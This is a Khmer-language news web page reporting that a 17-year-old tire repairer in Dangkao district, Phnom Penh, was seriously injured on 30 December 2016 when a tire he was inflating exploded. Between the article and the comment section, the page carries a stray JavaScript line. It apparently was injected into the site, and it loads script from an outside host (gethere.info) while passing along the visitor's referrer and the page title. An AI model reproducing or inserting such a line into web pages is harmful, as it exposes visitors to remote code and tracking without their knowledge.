ព្រឹតិ្តការណ៍ថ្មីៗ

អង្គុយប៉ះកង់រថយន្តត្រូវផ្ទុះកង់រថយន្តធ្វើអោយរបួសធ្ងន់

2 ឆ្នាំ មុន 0 tnn_admin

ភ្នំពេញៈ ហេតុការណ៌មួយបង្កអោយមានភ្ញាក់ផ្អើលកាលពីរវេលាម៉ោង១១និង៥០នាទីថ្ងៃត្រង់ថ្ងៃទី៣០ខែធ្នូឆ្នាំ២០១៦ តាមបណ្ដោយផ្លូវជាតិលេខ២ នៅក្នុងភូមិក្រាំងស្វាយ សង្កាត់ព្រែកកំពឹស ខណ្ឌដង្កោ បុរសម្នាក់អង្គុយប៉ះកង់រថយន្តត្រូវផ្ទុះកង់រថយន្តធ្វើអោយរបួសធ្ងន់។

ជនរងគ្រោះមានឈ្មោះ ម៉ៅ វិរះភេទប្រុសអាយុ១៧ឆ្នាំមានមុខរបរជាជាងប៉ះកង់រថយន្ត ស្នាក់នៅភូមិកើតហេតុខាងលើ បើប្រភពព័ត៍មានពីរកន្លែងកើតហេតុបានអោយដឹងថា នៅមុនពេលកើតហេតុជនរងគ្រោះខាងលើ ត្រូវបានគេយកកង់រថយន្តមកអោយប៉ះ ពេលដែលប៉ះរួចរាល់ហើយជនរងគ្រោះបានបូមខ្យល់ដាក់បញ្ចូលទៅក្នុងកង់រថយន្តដែលខ្លួនប៉ះរួច ដោយគ្មានការប្រុងប្រយត្ន័ក៏ផ្ទុះកង់រថយន្តនិងខ្ទាតយ៉ាន់ត្រូវមុខជនរងគ្រោះបណ្តាលអោយដួលសន្លប់នៅហ្នឹងកន្លែងកើតហេតុ។

ភ្លាមៗនោះដែរប្រពលរដ្ឋក៏បានរាយការណ៍មកសម្ថតិកិច្ចមូលរដ្ឋាន ពេលដែលសម្ថតិកិច្ចចុះមកដល់កន្លែងកើតហេតុក៏ឃើញសភាពជនរងគ្រោះរងរបួសធ្ងន់ក៏ទាក់ទងមករថយន្តសង្គ្រោះបន្ទាន់មន្ទីរពេទ្យបង្អែកដង្កោដើម្បីដឹកយកជនរងគ្រោះមកសង្គ្រោះដោយឃើញសភាពជនរងគ្រោះរបួសធ្ងន់ក៏ដឹកបន្តមកមន្ទីរពេទ្យលោកសង្ឈ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!